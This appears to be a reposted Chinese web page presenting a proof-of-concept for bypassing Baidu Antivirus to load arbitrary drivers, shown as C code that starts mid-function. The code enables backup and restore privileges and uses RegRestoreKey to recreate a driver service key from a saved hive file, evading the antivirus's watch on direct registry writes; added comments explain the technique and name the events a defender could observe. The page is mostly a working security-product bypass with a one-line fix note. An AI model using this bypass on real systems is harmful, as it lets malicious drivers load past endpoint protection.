再再绕百度杀毒任意加载驱动(POC)
发表时间:2022-06-27 来源:学卫网整理相关软件相关文章人气:
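/* Tail of the privilege-enabling helper (presumably EnableDebugPriv; its head
 * is outside this chunk). Carried over unchanged apart from line breaks.
 * NOTE(review): AdjustTokenPrivileges returning non-zero does not by itself
 * prove the privilege was granted; a non-administrative token simply does not
 * hold SeBackupPrivilege/SeRestorePrivilege and the later Reg* calls fail. */
TOKEN_QUERY, &hToken))
            break;
        if (!LookupPrivilegeValue(NULL, lpName, &luid))
            break;
        tp.PrivilegeCount = 1;
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        tp.Privileges[0].Luid = luid;
        bRet = AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
    } while (FALSE);
    if (hToken != NULL)
        CloseHandle(hToken);
    return bRet;
}

/*
 * DumpReg - save the key hKey\lpSubKey into the hive file szFilePath
 * with RegSaveKey.
 *
 * Requires SeBackupPrivilege, which EnableDebugPriv enables on the current
 * process token (administrative context only). The code assumes an ANSI
 * build: lpSubKey is an LPCSTR and the path is a TCHAR buffer.
 *
 * Returns TRUE on success, FALSE on any failure. The original compared the
 * RegSaveKey result the wrong way round and reported TRUE only when the save
 * failed; main never checked the result, so the behaviour of the program was
 * unaffected, but callers that do check now get the right answer.
 */
BOOL DumpReg(HKEY hKey, LPCSTR lpSubKey, TCHAR szFilePath[MAX_PATH])
{
    BOOL bRet = FALSE;
    HKEY hCur = NULL;

    do {
        if (!EnableDebugPriv(SE_BACKUP_NAME)) {
            break;
        }
        /* ulOptions is a DWORD; pass 0, not a pointer constant. */
        if (RegOpenKeyEx(hKey, lpSubKey, 0, KEY_ALL_ACCESS, &hCur) != ERROR_SUCCESS) {
            break;
        }
        if (RegSaveKey(hCur, szFilePath, NULL) != ERROR_SUCCESS) {
            break;
        }
        bRet = TRUE;
    } while (FALSE);

    if (hCur != NULL) {
        RegCloseKey(hCur);
    }
    return bRet;
}

/*
 * RestoreReg - replace the contents of hKey\lpSubKey with the hive file
 * szFilePath via RegRestoreKey, creating the key first if it does not exist.
 *
 * Requires SeRestorePrivilege (enabled by EnableDebugPriv; administrative
 * context only). REG_FORCE_RESTORE makes the restore proceed even when other
 * handles to the key are open. Because the key's data arrives as a whole hive
 * rather than as individual RegSetValue writes, this is the path the page's
 * "bypass" relies on; from a defensive point of view the observable events are
 * the privilege being enabled and the RegRestoreKey call itself.
 *
 * Returns TRUE on success, FALSE on any failure (the original had the
 * RegRestoreKey comparison inverted, as in DumpReg).
 */
BOOL RestoreReg(HKEY hKey, LPCSTR lpSubKey, TCHAR szFilePath[MAX_PATH])
{
    BOOL bRet = FALSE;
    HKEY hCur = NULL;

    do {
        if (!EnableDebugPriv(SE_RESTORE_NAME)) {
            break;
        }
        /* Open the key; if it is absent, create it so the restore has a target. */
        if (RegOpenKeyEx(hKey, lpSubKey, 0, KEY_ALL_ACCESS, &hCur) != ERROR_SUCCESS
            && RegCreateKey(hKey, lpSubKey, &hCur) != ERROR_SUCCESS) {
            break;
        }
        if (RegRestoreKey(hCur, szFilePath, REG_FORCE_RESTORE) != ERROR_SUCCESS) {
            break;
        }
        bRet = TRUE;
    } while (FALSE);

    if (hCur != NULL) {
        RegCloseKey(hCur);
    }
    return bRet;
}

/*
 * Entry point. Exit status is 0 when the restore succeeded, 1 otherwise
 * (the original always returned 0 and ignored the RestoreReg result).
 */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    /* Step 1 (done once, locally): save the prepared service key to a hive file. */
    /* DumpReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\poc", "C:\\poc.hiv"); */

    /* Step 2: recreate the service key by restoring that hive instead of
     * writing the registry values directly. */
    return RestoreReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\poc", "C:\\poc.hiv") ? 0 : 1;
}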
修复方案:牺牲一点用户体验吧。就爱阅读www.92to.com网友整理上传,为您提供最全的知识大全,期待您的分享,转载请注明出处。